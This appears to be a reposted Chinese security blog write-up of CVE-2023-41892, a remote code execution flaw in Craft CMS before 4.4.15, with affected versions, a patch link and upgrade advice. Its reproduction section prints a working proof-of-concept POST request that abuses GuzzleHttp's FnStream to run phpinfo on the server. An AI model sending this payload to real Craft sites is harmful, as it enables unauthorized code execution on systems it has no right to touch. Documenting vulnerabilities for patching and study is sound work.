Craft CMS 远程代码执行漏洞(CVE-2023-41892)

admin 2024年5月14日23:45:46评论29 views字数 1291阅读4分18秒阅读模式

网安引领时代,弥天点亮未来   

Craft CMS 远程代码执行漏洞(CVE-2023-41892)
0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

Craft CMS 远程代码执行漏洞(CVE-2023-41892)
0x01漏洞介绍

Pixel&tonic Craft CMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。

Pixel&tonic Craft CMS 4.4.15之前版本存在代码注入漏洞,该漏洞源于存在远程代码执行漏洞。

Craft CMS 是一个用于创建数字体验的平台。这是一种高影响力、低复杂性的攻击媒介。建议运行 4.4.15 之前的 Craft 安装的用户至少更新到该版本以缓解该问题。此问题已在 Craft CMS 4.4.15 中修复。

Craft CMS 远程代码执行漏洞(CVE-2023-41892)
0x02影响版本

4.0.0-RC1 <= Craft CMS <= 4.4.14

Craft CMS 远程代码执行漏洞(CVE-2023-41892)

Craft CMS 远程代码执行漏洞(CVE-2023-41892)
0x03漏洞复现

1.访问漏洞环境

Craft CMS 远程代码执行漏洞(CVE-2023-41892)

2.对漏洞进行复现

 POC (POST)

action=conditions/render&test[userCondition]=craftelementsconditionsusersUserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\GuzzleHttp\Psr7\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

漏洞复现

         POST请求, phpinfo注入命令

POST /index.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Connection: closeContent-Length: 238Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateaction=conditions/render&test[userCondition]=craftelementsconditionsusersUserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\GuzzleHttp\Psr7\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

     执行phpinfo成功

Craft CMS 远程代码执行漏洞(CVE-2023-41892)

3.nuclei测试(漏洞存在)

Craft CMS 远程代码执行漏洞(CVE-2023-41892)

Craft CMS 远程代码执行漏洞(CVE-2023-41892)
0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

Craft CMS 4.4.15 中修复,建议受影响用户升级。

https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月14日23:45:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Craft CMS 远程代码执行漏洞(CVE-2023-41892)https://cn-sec.com/archives/2058032.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息